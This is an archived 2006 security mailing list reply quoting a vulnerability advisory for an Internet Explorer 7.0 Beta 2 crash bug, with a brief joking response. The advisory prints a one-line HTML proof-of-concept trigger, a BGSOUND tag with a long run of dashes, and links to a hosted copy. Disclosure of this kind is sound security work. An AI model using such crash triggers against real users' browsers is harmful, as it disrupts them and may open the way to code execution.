funsec mailing list archives
Re: Internet Explorer 7.0 Beta 2 urlmon.dll DoS
From: Dave Aitel <dave.aitel () gmail com>
Date: Thu, 2 Feb 2006 19:48:59 -0500
I like your workaround. I guess my question is: why is your fuzzer so much better than theirs? What kind of bug is this, and how did it slip by? -dave On 2/1/06, Tom Ferris <tommy () security-protocols com> wrote:
Internet Explorer 7.0 Beta 2 urlmon.dll DoS Release Date: Jan 31, 2006 Severity: Medium Vendor: Microsoft Versions Affected: Internet Explorer 7.0 Beta 2 (7.0.5296.0) Overview: A denial of service vulnerability exists within Microsoft Internet Explorer 7.0 Beta 2 which allows for an attacker to cause the browser to crash, and or to execute arbitrary code on the targeted host. Technical Details: When running a specially crafted .html file, urlmon.dll inproperly parsers the 'BGSOUND SRC=file://---' (approx. 344 dashes) and causes the crash. The following html code will trigger the crash: <BGSOUND SRC=file://--------------------------------------------------------------------- -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- ---------------------------------- > or hit the following url: http://www.security-protocols.com/poc/sp-x23.html Vendor Status: Microsoft was notified. Workaround: Mozilla Firefox Discovered by: Tom Ferris <tommy[at]security-protocols[dot]com> Related Links: http://www.security-protocols.com/advisory/sp-x23.txt http://security-protocols.com/modules.php?name=News&file=article&sid=3169 http://www.microsoft.com/windows/IE/ie7/ie7betaredirect.mspx Copyright (c) 2006 Security-Protocols.com ----- Tom Ferris Researcher www.security-protocols.com Key fingerprint = 0DFA 6275 BA05 0380 DD91 34AD C909 A338 D1AF 5D78 _______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list.
_______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list.
Current thread:
- Internet Explorer 7.0 Beta 2 urlmon.dll DoS Tom Ferris (Feb 02)
- Re: Internet Explorer 7.0 Beta 2 urlmon.dll DoS Dave Aitel (Feb 02)